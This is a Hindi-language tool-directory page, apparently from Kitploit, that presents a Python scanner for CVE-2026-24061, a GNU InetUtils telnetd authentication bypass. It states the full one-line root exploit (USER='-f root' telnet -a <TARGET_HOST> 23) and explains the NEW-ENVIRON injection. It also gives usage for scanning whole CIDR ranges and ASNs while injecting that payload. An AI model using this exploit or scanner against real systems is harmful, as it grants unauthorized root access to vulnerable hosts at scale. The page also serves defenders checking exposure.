Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Twenty-Three-Scanner — CVE-2026-24061 - GNU InetUtils Telnetd रिमोट प्रमाणीकरण बायपास | Kitploit
उपकरण/GitHubGitHub/madfxr/twenty-three-scanner
टोहीभेद्यता स्कैनरशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmadfxr/twenty-three-scanner

Twenty-Three-Scanner

CVE-2026-24061 - GNU InetUtils Telnetd रिमोट प्रमाणीकरण बायपास

रिपॉजिटरी देखें
46 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛰️ ट्वेंटी-थ्री स्कैनर

CVE-2026-24061 से प्रभावित कमजोर Telnetd सेवाओं का पता लगाने के लिए एक शक्तिशाली, तेज़, और सुंदर स्कैनर। शुद्ध Python मानक लाइब्रेरी के साथ निर्मित - किसी बाहरी निर्भरता की आवश्यकता नहीं।

License: MIT Python 3.x Android Windows macOS Solaris FreeBSD Linux Offensive Security Ethical Hacking CVE-2026-24061 GNU InetUtils Telnetd


🔗 विषय-सूची

  • ⚖️ लाइसेंस
  • 🧩 विशेषताएँ
  • ☣️ भेद्यता विवरण
    • ⚡ सेवा स्थिति
    • 🧪 प्रूफ ऑफ कॉन्सेप्ट (PoC)
    • 💥 प्रभावित संस्करण
    • 🧵 पैच किए गए संस्करण
    • ⚔️ हमला वेक्टर
    • 🚨 CVSS स्कोर
  • 🛠️ स्थापना
  • 📜 उपयोग
  • 🎯 उदाहरण
  • ⚗️ डेमो
  • 📖 संदर्भ

🧩 विशेषताएँ

  • 🚀 उच्च-प्रदर्शन स्कैनिंग – कॉन्फ़िगर करने योग्य थ्रेड गणना के साथ मल्टी-थ्रेडेड आर्किटेक्चर।
  • 🌐 लचीला लक्ष्य इनपुट – एकल IP, CIDR रेंज, ASN लुकअप, और फ़ाइल-आधारित सूचियों के लिए समर्थन।
  • 📊 रीयल-टाइम प्रगति – लाइव प्रगति बार के साथ सुंदर यूनिकोड-आधारित UI।
  • 🤖 ASN इंटेलिजेंस – RADB, BGPView, और HackerTarget APIs से स्वचालित प्रीफ़िक्स प्राप्त करना।
  • 🌍 GEO लोकेशन इंटेलिजेंस – ipapi API से रीयल-टाइम ASN, प्रदाता और स्थान प्राप्त करना।
  • 💾 सुगम रुकावट – स्वचालित परिणाम सहेजने के साथ CTRL+C हैंडलिंग।
  • 📝 विस्तृत लॉगिंग – डिबगिंग के लिए कॉन्फ़िगर करने योग्य वर्बोसिटी स्तर।
  • 🛡️ सुरक्षित स्कैनिंग – आकस्मिक बड़े पैमाने पर स्कैन को रोकने के लिए अंतर्निहित सीमाएँ।
  • 🎨 स्वच्छ आउटपुट – स्कैन सारांश के साथ पेशेवर बॉर्डर वाली तालिकाएँ।
  • 📦 शून्य निर्भरताएँ – केवल शुद्ध Python 3.x मानक लाइब्रेरी।

☣️ भेद्यता विवरण

CVE-2026-24061 GNU InetUtils Telnetd में एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो बिना प्रमाणीकरण के दूरस्थ हमलावरों को NEW-ENVIRON विकल्प हैंडलिंग का शोषण करके रूट एक्सेस प्राप्त करने की अनुमति देती है।


⚡ सेवा स्थिति

निम्नलिखित लक्ष्य होस्ट पक्ष पर Telnetd सेवा कॉन्फ़िगरेशन है।

image


🧪 प्रूफ ऑफ कॉन्सेप्ट (PoC)

और यहाँ इस भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) है, जिसे हमलावर के होस्ट से केवल USER="-f root" telnet -a <TARGET_HOST> 23 कमांड चलाकर मैन्युअल रूप से निष्पादित किया जा सकता है।

image


💥 प्रभावित संस्करण

  • GNU InetUtils >=1.9.3 <=2.7।
  • विभिन्न एम्बेडेड Linux वितरण।
  • कमजोर Telnetd कार्यान्वयन वाले IoT डिवाइस।

🧵 पैच किए गए संस्करण

  • GNU InetUtils >=2.8।

⚔️ हमला वेक्टर

यह भेद्यता टेलनेट NEW-ENVIRON (RFC 1572) विकल्प वार्ता में USER पर्यावरण चर के अनुचित सत्यापन का शोषण करती है, जिससे हमलावरों को प्रमाणीकरण बायपास करने के लिए -f root जैसे दुर्भावनापूर्ण मान इंजेक्ट करने की अनुमति मिलती है।


🚨 CVSS स्कोर

9.8 (क्रिटिकल) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H।


🛠️ स्थापना

root@kitploit:~
# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner

# Make Executable
sudo chmod +x twenty-three-scanner.py

# Run the Script
sudo python3 twenty-three-scanner.py -h

📜 उपयोग

निम्नलिखित ट्वेंटी-थ्री स्कैनर टूल के लिए एक मैनुअल है जिसका उपयोग भेद्यता CVE-2026-24061 - GNU InetUtils Telnetd रिमोट प्रमाणीकरण बायपास का पता लगाने के लिए किया जा सकता है।

root@kitploit:~
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
                                       [--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]

CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass

options:
  -h, --help            show this help message and exit

Target Options:
  -t TARGET, --target TARGET
                        target IP, CIDR, or comma-separated list (can be used multiple times)
  -f FILE, --file FILE  file containing targets (one per line, supports comments with #)
  -a ASN, --asn ASN     autonomous system number (e.g., AS10111 or 10111)

Scan Options:
  -p PORT, --port PORT  target port(s), comma-separated (default: 23)
  --threads N           number of concurrent threads (default: 50)
  --user-value VALUE    USER environment variable value for exploit (default: '-f root')

Timeout Options:
  --connect-timeout SEC
                        TCP connection timeout in seconds (default: 3.0)
  --read-timeout SEC    socket read timeout in seconds (default: 2.0)
  --id-timeout SEC      'id' command response timeout in seconds (default: 2.0)

Limit Options:
  --max-hosts-per-cidr N
                        maximum hosts to scan per CIDR block (default: 1024)
  --max-total-hosts N   maximum total hosts across all targets (default: 50000)
  --skip-large-networks
                        skip networks larger than /16 (avoids accidentally scanning huge ranges)

Output Options:
  -o FILE, --output FILE
                        save vulnerable hosts to file (format: IP:PORT)
  -v, --verbose         enable verbose debug logging

🎯 उदाहरण

और यहाँ कमांड का उपयोग करने के कुछ उदाहरण दिए गए हैं।

root@kitploit:~
  # Scan Single IP Address, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23

  # Scan Single IP Address, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323

  # Scan Multiple IP Addresses, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23

  # Scan Multiple Addresses, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323

  # Scan CIDR Range, and Single Port with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt

  # Scan CIDR Range, and Multiple Ports with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt

  # Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt

  # Scan Single IP Address, Multiple IP Addresss, or CIDR Range from File, and Multiple Ports with Custom Threads and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt

  # Scan ASN and Single Port with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100

  # Scan ASN and Multiple Ports with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100

  # Scan ASN with Custom Limits and Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100

⚗️ डेमो

एकल IP पते को कई पोर्ट के साथ स्कैन करें।

image

कई IP पतों को एकल पोर्ट के साथ स्कैन करें।

image

CIDR रेंज को एकल पोर्ट के साथ स्कैन करें।

image

ASN को कई पोर्ट के साथ स्कैन करें।

image

फ़ाइल से एकल IP पता, कई पते, या CIDR रेंज को एकल पोर्ट के साथ कस्टम थ्रेड और आउटपुट के साथ स्कैन करें।

image


📖 संदर्भ

  • Critical GNU InetUtils telnetd Flaw Lets Attackers Bypass Login and Gain Root Access
  • NVD - CVE-2026-24061
  • CVE Record: CVE-2026-24061
  • Inetutils - GNU network utilities
  • [SECURITY] [DLA 4453-1] inetutils security update
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnet
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • CVE-2026-24061 Telnet RCE Exploit - By SafeBreach Labs
टूल डाउनलोड करें